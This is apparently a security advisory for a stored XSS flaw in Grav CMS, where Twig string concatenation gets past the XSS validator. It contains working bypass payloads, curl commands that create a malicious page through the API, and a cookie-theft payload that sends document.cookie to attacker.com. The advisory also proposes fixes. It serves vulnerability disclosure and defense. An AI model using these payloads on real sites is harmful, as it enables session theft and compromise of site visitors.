The XSS blueprint validator (Security::detectXss()) runs on the raw page content before Twig processing. An attacker can use Twig's string concatenation operator (~) to dynamically construct an event handler name at render time. The validator sees {{ "on" ~ "error" }} - a harmless Twig expression - and allows the content. After Twig processes the template, the output contains <img src=1 onerror=alert(1)> which is rendered via {{ content|raw }} and executes in the victim's browser.
The two-stage attack exploits the separation between validation and rendering:
Stage 1 - what the XSS validator sees (raw page content):
{% set x = "on" ~ "error" %}
<img src=1 {{ x }}=alert(document.domain)>
The detectXss() function scans this string. The on_events regex looks for <[^>]*?[\s\x00-\x20\"\'\/](on\s*[a-z]+|xmlns)\s*= inside HTML tags. In {{ x }}, the { character is not in the boundary set [\s\x00-\x20\"\'\/], and x is not on. No match - passes validation.
Stage 2 - what Twig produces (after rendering):
<img src=1 onerror=alert(document.domain)>
The validator never re-inspects Twig output. The theme template renders this via {{ page.content|raw }} (confirmed in quark2/templates/default.html.twig:5), so no auto-escaping occurs.
Why {% set %} and ~ are allowed - system/config/security.yaml:125-145:
allowed_tags:
- set # ← allows variable assignment
...
The ~ operator is a core Twig operator for string concatenation (like . in PHP). It is not a function, filter, or tag — it is always available and not gated by the sandbox.
The same technique bypasses the dangerous_tags blocklist - any blocked tag name can be reconstructed:
<s{{"c"~"r"~"i"~"p"~"t"}}>alert(1)</s{{"c"~"r"~"i"~"p"~"t"}}>
{# XSS validator sees: <s{{...}}> - no <script> tag detected
Twig output: <script>alert(1)</script> #}
Also bypasses the invalid_protocols check:
<a href="{{"java"~"script"}}:alert(1)">click</a>
{# Validator sees: href="{{...}}" - no "javascript:" protocol detected #}
twig_content.process_enabled: true set by adminapi.pages.write permission (page creation)JWT=$(curl -s http://127.0.0.1/grav/api/v1/auth/token \
-X POST -H "Content-Type: application/json" \
-d '{"username":"user","password":"pass"}' \
| python3 -c "import json,sys; print(json.load(sys.stdin)['data']['access_token'])")
curl -s http://127.0.0.1/grav/api/v1/pages -X POST \
-H "Authorization: Bearer $JWT" -H "Content-Type: application/json" \
-d '{
"title": "xss-page",
"folder": "xss-page",
"route": "/xss-page",
"template": "default",
"header": {"title": "xss", "process": {"markdown": false}},
"content": "{% set x = \"on\" ~ \"error\" %}<img src=1 {{ x }}=alert(document.domain)>"
}'
Result: 201 Created - XSS validator passes because it sees {{ x }}, not onerror.
curl -s http://127.0.0.1/grav/xss-page | grep -oP '<img[^>]*>'
# Output: <img src=1 onerror=alert(document.domain)>
Open in browser: http://127.0.0.1/grav/xss-page - alert(document.domain) fires.
Also From a low-level user normal script such as <img src=1 onerror=alert(1)> this is being blocked by the restriction.
But with payloads such as <a href="{{"java"~"script"}}:alert(1)">click proves that the we can bypass the blueprint restrictions and upload malicious script to it
| Payload | Twig Source | After Twig | Triggers |
|---|---|---|---|
| Event handler | <img src=1 {{"on"~"error"}}=alert(1)> |
<img src=1 onerror=alert(1)> |
Image load fails |
| Script tag | <s{{"c"~"r"~"i"~"p"~"t"}}>alert(1)</s{{"c"~"r"~"i"~"p"~"t"}}> |
<script>alert(1)</script> |
Immediately |
| Protocol bypass | <a href="{{"java"~"script"}}:alert(1)">click</a> |
<a href="javascript:alert(1)">click</a> |
On click |
| Iframe onload | <i{{"f"~"r"~"a"~"m"~"e"}} {{"on"~"load"}}=alert(1)> |
<iframe onload=alert(1)> |
Page load |
| Details toggle | <details open {{"on"~"toggle"}}=alert(1)> |
<details open ontoggle=alert(1)> |
Page load |
| Cookie theft | <img src=1 {{"on"~"error"}}=fetch("https://attacker.com/?c="+document.cookie)> |
<img src=1 onerror=fetch(...)> |
Image load fails |
The Admin2 SPA renders page previews inside a sandboxed iframe:
<iframe sandbox="allow-same-origin allow-scripts allow-forms"></iframe>
allow-modals is not set - alert() is silenced in the admin preview. Use fetch(), document.write(), or DOM manipulation payloads to prove execution in the admin panel. The frontend page (no iframe) has no such restriction - alert() fires directly.
Once the Twig content master gate is enabled by an administrator, any user with page write access can inject stored XSS into page content that executes for all visitors. The attack:
on_events, invalid_protocols, dangerous_tags, html_inline_styles)<script>, <iframe>, <svg>, etc.)javascript:, data:)An attacker can steal session cookies, perform actions as the victim, or deface the site.
After Twig::processPage() renders the content, run the XSS validator on the output before it is cached and served:
// In Twig::processPage(), after rendering
$rendered = $twig->render($name, $context);
$result = Security::detectXss($rendered);
if ($result !== null) {
// Log and sanitize or block
Security::logTwigSandboxViolation('xss_output', $result, '', $route);
return ''; // or return escaped version
}
~ and {% set %} in sandboxed content (too restrictive)Removing string concatenation or variable assignment from the sandbox would break legitimate use cases (e.g., building dynamic class names, assembling URLs).
Parse the Twig output for HTML and check if any event handler attributes were dynamically constructed. This is complex but comprehensive.
Wrap the rendered output with htmlspecialchars() unless explicitly marked safe. This is the Twig default behavior — the |raw filter in theme templates bypasses it. Consider removing |raw from default themes and requiring explicit |raw only for trusted content.
{
"cwe_ids": [
"CWE-1336",
"CWE-184",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-16T22:13:17Z",
"nvd_published_at": "2026-07-15T17:16:51Z",
"severity": "MODERATE"
}